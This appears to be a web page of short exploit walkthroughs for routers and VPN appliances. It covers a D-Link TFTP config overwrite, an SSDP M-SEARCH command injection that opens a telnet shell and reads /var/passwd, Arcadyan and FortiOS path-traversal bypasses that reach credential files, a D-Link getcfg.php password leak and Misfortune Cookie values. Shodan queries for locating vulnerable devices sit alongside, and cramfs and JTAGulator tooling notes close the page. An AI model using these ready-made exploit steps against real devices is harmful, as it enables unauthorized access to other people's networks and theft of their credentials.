Easy Hacks

Introduction D-Link DSL-2750U router with firmware vME1.16 or prior versions is vulnerable to unauthorized configuration modification. Exploit Export configuration file from a DSL-2750U router whose password is known. Connect to the tftp server on router whose password is not known and send the configuration file containing known password. tftp 192.168.1.1 binary put cfg.xml All configuration, including the password of the router will be changed to that in uploaded configuration file. Video

Introduction Authentication can be bypassed on D-Link DIR-802 A1 by injecting a payload into the Search Target (ST) field of the SSDP M-SEARCH discover packet. Exploit Create a text file with SSDP M-SEARCH payload to inject command to start telnet service on port 1234. M-SEARCH * HTTP/1.1 HOST:192.168.0.1:1900 ST:urn:schemas-upnp-org:service:WANIPConnection:1;telnetd -p 1234 MX:2 MAN:"ssdp:discover" Send the payload to UPnP UDP port 1900 using nc. nc -u 192.168.0.1 1900 < payload.txt Connect to telnet service on TCP port 1234.  nc -v 192.168.0.1 1234 View the credentials from file /var/passwd. cat /var/passwd Video

Extract Cramfs Check the endianness of the Cramfs file: file cramfs  This is a big endian file. Convert cramfs  file to little endian file cramfs_le using cramfsswap. cramfsswap cramfs cramfs_le Extract the little endian file  cramfs_le to folder fs using fsck.cramfs. sudo fsck.cramfs --extract=fs cramfs_le Create Cramfs Use mkfs.cramfs to create Cramfs file system from the contents of folder fs .To create a little endian file system: sudo mkfs.cramfs fs cramfs_new For big endian Cramfs file system: sudo mkfs.cramfs -N big fs cramfs_new Video

Introduction Path traversal vulnerability in the web interface of routers with Arcadyan firmware (Buffalo, etc.) can be exploited to bypass authentication. Exploit 1. Open Burp Suite and go to Proxy > Options tab and add Match and Replace rule to remove path traversal string from Referer in request header.  Match /images/..%2f and replace it with / 2. Add another Match and Replace rule to prefix all URLs with images/..%2f .  Match GET / and replace it with GET /images/..%2f 3. Now browse the router web interface pages through Burp Suite proxy browser. All the request URLs will be automatically modified by the proxy. Some of the URLs which can be accessed without authentication: http://targetip http://targetip/info.html http://targetip/log_log.html http://targetip/lan_bridge.html http://targetip/save_init.html http://targetip/wireless_band2g.html http://targetip/ap_password_access_date_ntp.html Video

Introduction Information disclosure issue in D-LINK-DIR-615 B2 2.01mt can be exploited to gain access access to the device. Exploit 1. Open the login page of device in BurpSuite Proxy. Click on Login button and intercept the request. 2. Change HTTP Method from GET to POST 3. Change URL to /getcfg.php 4. Provide post data as SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1 followed by new line. 5. Forward the request and view the response in HTTP history tab. Find the password in response and use it to login to the device. Video

Introduction AllegroSoft RomPager 4.34 and earlier used in certain devices has a vulnerability which can be exploited to bypass authentication using a crafted cookie. Device Identification Identify vulnerable devices using shodan query: "RomPager/4.07" "EXT:" Exploit Each firmware has a specific " number " and " offset " value which can be obtained from: https://github.com/threat9/routersploit/blob/master/routersploit/modules/exploits/routers/multi/misfortune_cookie.py For TP-Link TD-8816  router with firmware V6_100907 the number  is 107369788 and offset  is 1. To disable the authentication of this router, cookie to be sent is C107369788=A\x00. For TP-Link TD-8840T V3_110221 number and offset are 107369764 and 5, so cookie would be C107369764=AAAAA\x00. Intercept the request request sent by login page in BurpSuite Proxy and add the cookie corresponding to the firmware as given in figure below. Click on Hex tab and edit the value corresponding t

Introduction Fortinet FortiOS SSL VPN web portal allows download of system files without authentication. Device Identification Identify vulnerable devices from the results of Shodan query: http.html_hash:-1454941180 Path Traversal Access sslvpn_websession file which contain credentials using URL: https://targetIP:port/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession Video

Steps 1. Download latest stable firmware from the JTAGulator github page. At the moment, version 1.11 is the latest.  wget https://github.com/grandideastudio/jtagulator/archive/refs/tags/1.11.zip 2. Unzip downloaded zip file: unzip 1.11.zip JTAGulator.eeprom is the file required for upgrading firmware. 3. Dowload BST command line loader: wget https://www.fnarfbargle.com/bst/bstl/Latest/bstl.linux.zip 4. Unzip BST loader zip file: unzip bstl.linux.zip 5. Upgrade JTAGulator firmware: sudo ./bstl.linux -d /dev/ttyUSB0 -p 3 jtagulator-1.11/JTAGulator.eeprom Video